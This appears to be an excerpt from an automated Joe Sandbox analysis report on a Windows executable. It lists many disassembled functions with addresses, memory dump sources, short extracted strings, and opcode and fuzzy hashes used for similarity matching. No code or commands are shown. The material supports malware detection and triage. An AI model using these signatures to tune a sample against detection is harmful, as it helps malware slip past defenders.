                                                                                                                          • Instruction Fuzzy Hash: 61D1D3729082658FC725CE18D89072EB7E1EB85718F158A6CE8B5AB380CB71DE06D7C1
                                                                                                                          Function 00B2CCD0 Relevance: 1.6, Strings: 1, Instructions: 357COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.2445782982.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.2445771783.0000000000B00000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2445877592.0000000000B60000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2445877592.0000000000CE0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2445877592.0000000000DC4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2445877592.0000000000DEF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2445877592.0000000000DF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2445877592.0000000000E05000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2446155255.0000000000E06000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2446244221.0000000000FA0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_b00000_file.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: InitializeThunk
                                                                                                                          • String ID: %*+(
                                                                                                                          • API String ID: 2994545307-3233224373
                                                                                                                          • Opcode ID: d5216fdb207990f3f8883dffacc0db4c4ece20c88903c1a8c4d37d3a21fbe37a
                                                                                                                          • Instruction ID: 01a04536b363868a4d2c303f678d89a37c702dfea8cac955103d246d9b7879cf
                                                                                                                          • Opcode Fuzzy Hash: d5216fdb207990f3f8883dffacc0db4c4ece20c88903c1a8c4d37d3a21fbe37a
                                                                                                                          • Instruction Fuzzy Hash: 8BB101706083118BD714EF18E890B2FBBE2EF85340F1449ACE5C98B352E735E859CB92
                                                                                                                          Function 00B0A850 Relevance: 1.5, Strings: 1, Instructions: 271COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.2445782982.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.2445771783.0000000000B00000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2445877592.0000000000B60000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2445877592.0000000000CE0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2445877592.0000000000DC4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2445877592.0000000000DEF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2445877592.0000000000DF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2445877592.0000000000E05000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2446155255.0000000000E06000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2446244221.0000000000FA0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_b00000_file.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: ,
                                                                                                                          • API String ID: 0-3772416878
                                                                                                                          • Opcode ID: 6a3fef2072c4110c7e08f213014c8aa891b97c95317c3c670d38149bab24221c
                                                                                                                          • Instruction ID: 0b013610873d0a4e5228a9d96027cdbd560786db4f190acd9d44744b266d6d98
                                                                                                                          • Opcode Fuzzy Hash: 6a3fef2072c4110c7e08f213014c8aa891b97c95317c3c670d38149bab24221c
                                                                                                                          • Instruction Fuzzy Hash: 8EB116712083859FD324CF18C88061BBFE1AFA9704F448E6DE5D997382D671EA18CB67
                                                                                                                          Function 00B3FC20 Relevance: 1.5, Strings: 1, Instructions: 265COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.2445782982.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.2445771783.0000000000B00000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2445877592.0000000000B60000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2445877592.0000000000CE0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2445877592.0000000000DC4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2445877592.0000000000DEF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2445877592.0000000000DF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2445877592.0000000000E05000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2446155255.0000000000E06000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2446244221.0000000000FA0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_b00000_file.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: %*+(
                                                                                                                          • API String ID: 0-3233224373
                                                                                                                          • Opcode ID: c5b49d2d9d6a0f77f69d646da7abfbcf0d04e1a558e986260fedf35d0b8020b5
                                                                                                                          • Instruction ID: 22bb246a42b2d8d5d8895e099373756ae087649e542fd1c777058bf5f634e3eb
                                                                                                                          • Opcode Fuzzy Hash: c5b49d2d9d6a0f77f69d646da7abfbcf0d04e1a558e986260fedf35d0b8020b5
                                                                                                                          • Instruction Fuzzy Hash: E981EF70909302EBD710DF58E884B2AB7E5FB99702F6488ACF5C587251DB30E914DB62
                                                                                                                          Function 00B1D457 Relevance: 1.5, Strings: 1, Instructions: 248COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.2445782982.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.2445771783.0000000000B00000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2445877592.0000000000B60000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2445877592.0000000000CE0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2445877592.0000000000DC4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2445877592.0000000000DEF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2445877592.0000000000DF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2445877592.0000000000E05000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2446155255.0000000000E06000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2446244221.0000000000FA0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_b00000_file.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: %*+(
                                                                                                                          • API String ID: 0-3233224373
                                                                                                                          • Opcode ID: a991e277fdb7c6f981cd061c3c410fb45d5d744c2cb3e246f2b6623406fc9553
                                                                                                                          • Instruction ID: c10ef6ced6a53a6c5163a570c6eda1837fa0a5c737a430da4d34af10691db378
                                                                                                                          • Opcode Fuzzy Hash: a991e277fdb7c6f981cd061c3c410fb45d5d744c2cb3e246f2b6623406fc9553
                                                                                                                          • Instruction Fuzzy Hash: FA61E172908314DBD710EF18DC82A6AB7F1FFA4355F8809ACF9859B291E731E950C792
                                                                                                                          Function 00CC84CB Relevance: 1.5, Strings: 1, Instructions: 244COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.2445877592.0000000000B60000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.2445771783.0000000000B00000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2445782982.0000000000B01000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2445877592.0000000000CE0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2445877592.0000000000DC4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2445877592.0000000000DEF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2445877592.0000000000DF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2445877592.0000000000E05000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2446155255.0000000000E06000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2446244221.0000000000FA0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_b00000_file.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: x i?
                                                                                                                          • API String ID: 0-3051088988
                                                                                                                          • Opcode ID: 1cabd3059acc44533938d367cd0d3e27094c778ca72a8c763d9e7cd5e6f54067
                                                                                                                          • Instruction ID: 1adff68839212bb9ea64217ecfe25086c0458b55de487bdda68894e8972d75d6
                                                                                                                          • Opcode Fuzzy Hash: 1cabd3059acc44533938d367cd0d3e27094c778ca72a8c763d9e7cd5e6f54067
                                                                                                                          • Instruction Fuzzy Hash: 9271D2F250D304AFE308AF29EC8157AFBE5FF94710F56492DE6C583744EA766804CA46
                                                                                                                          Function 00B44A40 Relevance: 1.5, Strings: 1, Instructions: 220COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.2445782982.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.2445771783.0000000000B00000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2445877592.0000000000B60000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2445877592.0000000000CE0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2445877592.0000000000DC4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2445877592.0000000000DEF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2445877592.0000000000DF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2445877592.0000000000E05000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2446155255.0000000000E06000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2446244221.0000000000FA0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_b00000_file.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: %*+(
                                                                                                                          • API String ID: 0-3233224373
                                                                                                                          • Opcode ID: 8acbf034b17551ae77252d091daa324dc7b1ff00bb2f5c3e44ec765be0bbe0b7
                                                                                                                          • Instruction ID: 6912d7a910744f771bd1ba610b03ca3995ffac46922406447edba11564b6e598
                                                                                                                          • Opcode Fuzzy Hash: 8acbf034b17551ae77252d091daa324dc7b1ff00bb2f5c3e44ec765be0bbe0b7
                                                                                                                          • Instruction Fuzzy Hash: C86103716083419FD720DF55C8C0B2AB7E6EBC4311F18899CE5C587292D771EE20EB52
                                                                                                                          Function 00B0E1A0 Relevance: 1.4, Strings: 1, Instructions: 175COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          Strings
                                                                                                                          • 000102030405060708090A0B0C0D0E0F101112131415161718191A1B1C1D1E1F202122232425262728292A2B2C2D2E2F303132333435363738393A3B3C3D3E3F404142434445464748494A4B4C4D4E4F505152535455565758595A5B5C5D5E5F606162636465666768696A6B6C6D6E6F707172737475767778797A7B7C7D7E7F8081, xrefs: 00B0E333
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.2445782982.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.2445771783.0000000000B00000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2445877592.0000000000B60000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2445877592.0000000000CE0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2445877592.0000000000DC4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2445877592.0000000000DEF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2445877592.0000000000DF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2445877592.0000000000E05000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2446155255.0000000000E06000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2446244221.0000000000FA0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_b00000_file.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: 000102030405060708090A0B0C0D0E0F101112131415161718191A1B1C1D1E1F202122232425262728292A2B2C2D2E2F303132333435363738393A3B3C3D3E3F404142434445464748494A4B4C4D4E4F505152535455565758595A5B5C5D5E5F606162636465666768696A6B6C6D6E6F707172737475767778797A7B7C7D7E7F8081
                                                                                                                          • API String ID: 0-2471034898
                                                                                                                          • Opcode ID: db7cdb526d66fa0ab2341660e2f28557a570536ae64d635c93fa51d9d814ec16
                                                                                                                          • Instruction ID: 4a2c18dcf53bbb3b72d46eb843909dd6dee20c39b393a19cef9966d99a418a10
                                                                                                                          • Opcode Fuzzy Hash: db7cdb526d66fa0ab2341660e2f28557a570536ae64d635c93fa51d9d814ec16
                                                                                                                          • Instruction Fuzzy Hash: 5B512837B1A6904BD329893C5C952696EC71BA3334B3DCBA9E9F18B3E1D555C8018390
                                                                                                                          Function 00B43920 Relevance: 1.4, Strings: 1, Instructions: 172COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.2445782982.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.2445771783.0000000000B00000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2445877592.0000000000B60000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2445877592.0000000000CE0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2445877592.0000000000DC4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2445877592.0000000000DEF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2445877592.0000000000DF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2445877592.0000000000E05000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2446155255.0000000000E06000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2446244221.0000000000FA0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_b00000_file.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: %*+(
                                                                                                                          • API String ID: 0-3233224373
                                                                                                                          • Opcode ID: c6a6c096be3387314ee4d7e21d6b7439c9cf3e1803e23ba7700d6c7bf00c7eae
                                                                                                                          • Instruction ID: a5110fcbff1ce1c10b40f1de5a7e41819cf335c1188def3a2632c84a7a64bbdc
                                                                                                                          • Opcode Fuzzy Hash: c6a6c096be3387314ee4d7e21d6b7439c9cf3e1803e23ba7700d6c7bf00c7eae
                                                                                                                          • Instruction Fuzzy Hash: 0D518E306093409BCB24DF15D990A2EBBE5EF89B45F1C889CE4C697251D772DF10EB62
                                                                                                                          Function 00C67848 Relevance: 1.4, Strings: 1, Instructions: 153COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.2445877592.0000000000B60000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.2445771783.0000000000B00000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2445782982.0000000000B01000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2445877592.0000000000CE0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2445877592.0000000000DC4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2445877592.0000000000DEF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2445877592.0000000000DF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2445877592.0000000000E05000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2446155255.0000000000E06000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2446244221.0000000000FA0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_b00000_file.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: Qhc{
                                                                                                                          • API String ID: 0-2637610387
                                                                                                                          • Opcode ID: e49c2f0fbaaf6ac24a0a249b0518d0455c8706373a8745584a86aa6d11e7b334
                                                                                                                          • Instruction ID: d2d624bab3957283a7763ff53d9d524c7bc74cf31331dd743a60ec6689dca8a2
                                                                                                                          • Opcode Fuzzy Hash: e49c2f0fbaaf6ac24a0a249b0518d0455c8706373a8745584a86aa6d11e7b334
                                                                                                                          • Instruction Fuzzy Hash: E341E9F3E457284BE3102D29DC88366BAD5DB45320F2B0339DF98A7BC5D87A5D0642C5
                                                                                                                          Function 00B11BEE Relevance: 1.4, Strings: 1, Instructions: 128COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.2445782982.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.2445771783.0000000000B00000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2445877592.0000000000B60000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2445877592.0000000000CE0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2445877592.0000000000DC4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2445877592.0000000000DEF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2445877592.0000000000DF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2445877592.0000000000E05000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2446155255.0000000000E06000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2446244221.0000000000FA0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_b00000_file.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: L3
                                                                                                                          • API String ID: 0-2730849248
                                                                                                                          • Opcode ID: 18e37513eb64b5ae17a518c90ba2603a2cb63380a040848a20a7486f2ef8ba58
                                                                                                                          • Instruction ID: 8da2f5e9d45b841818ebd875198b80626f3685c2ffcd850fec2b6ee540c63998
                                                                                                                          • Opcode Fuzzy Hash: 18e37513eb64b5ae17a518c90ba2603a2cb63380a040848a20a7486f2ef8ba58
                                                                                                                          • Instruction Fuzzy Hash: DC4162B40083809BC7149F18D894A6BBBF0FF86314F448D5CF6C59B290D736CA55CB96
                                                                                                                          Function 00B3FF70 Relevance: 1.4, Strings: 1, Instructions: 124COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.2445782982.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.2445771783.0000000000B00000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2445877592.0000000000B60000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2445877592.0000000000CE0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2445877592.0000000000DC4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2445877592.0000000000DEF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2445877592.0000000000DF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2445877592.0000000000E05000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2446155255.0000000000E06000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2446244221.0000000000FA0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_b00000_file.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: %*+(
                                                                                                                          • API String ID: 0-3233224373
                                                                                                                          • Opcode ID: 1f4755b8bb1c8edbeaf4ef142686efb6802db3a2033fee9cf5f801f99201855d
                                                                                                                          • Instruction ID: 08d9de4ab506615802b8477b2d0acdb1410999c15176c42e9a5c92e2a9ba4779
                                                                                                                          • Opcode Fuzzy Hash: 1f4755b8bb1c8edbeaf4ef142686efb6802db3a2033fee9cf5f801f99201855d
                                                                                                                          • Instruction Fuzzy Hash: 34311871914309ABD610FB54EC81B2BB7E9EB85744F5448A8FA8487352E331DE14D763
                                                                                                                          Function 00B2E40C Relevance: 1.4, Strings: 1, Instructions: 108COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.2445782982.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.2445771783.0000000000B00000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2445877592.0000000000B60000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2445877592.0000000000CE0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2445877592.0000000000DC4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2445877592.0000000000DEF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2445877592.0000000000DF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2445877592.0000000000E05000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2446155255.0000000000E06000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2446244221.0000000000FA0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_b00000_file.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: 72?1
                                                                                                                          • API String ID: 0-1649870076
                                                                                                                          • Opcode ID: 1cdf6f0a22b1ffe4472992a8d9509d88198794dbf5cda490924b9a0f8bde9e7f
                                                                                                                          • Instruction ID: 9fcdc354a911e068efbc3642e8fda76749958650ce15d4cecac015f3e1786878
                                                                                                                          • Opcode Fuzzy Hash: 1cdf6f0a22b1ffe4472992a8d9509d88198794dbf5cda490924b9a0f8bde9e7f
                                                                                                                          • Instruction Fuzzy Hash: F831C3B5A00314CFC720CF99E8806AFBBF4FB0A305F140898E45AAB251D731ED05CBA1
                                                                                                                          Function 00B16F91 Relevance: 1.4, Strings: 1, Instructions: 108COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.2445782982.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.2445771783.0000000000B00000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2445877592.0000000000B60000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2445877592.0000000000CE0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2445877592.0000000000DC4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2445877592.0000000000DEF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2445877592.0000000000DF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2445877592.0000000000E05000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2446155255.0000000000E06000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2446244221.0000000000FA0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_b00000_file.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: %*+(
                                                                                                                          • API String ID: 0-3233224373
                                                                                                                          • Opcode ID: 0f73dc30e407d933c236b67dfdfcafe33ef802492ec0fd334c37d9b3835e6d59
                                                                                                                          • Instruction ID: ac29d582510c985fe5355afff2a14c93e88646cceaf38a7cf3974b79bf5597c9
                                                                                                                          • Opcode Fuzzy Hash: 0f73dc30e407d933c236b67dfdfcafe33ef802492ec0fd334c37d9b3835e6d59
                                                                                                                          • Instruction Fuzzy Hash: F1413675244B04DBD7358F61C994F26BBF2FB0D702F94899CE5869BAA1EB31F8408B10
                                                                                                                          Function 00B2E66A Relevance: 1.4, Strings: 1, Instructions: 100COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.2445782982.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.2445771783.0000000000B00000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2445877592.0000000000B60000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2445877592.0000000000CE0000.00000040.00000001.01000000.00000003.sdmpDownload File
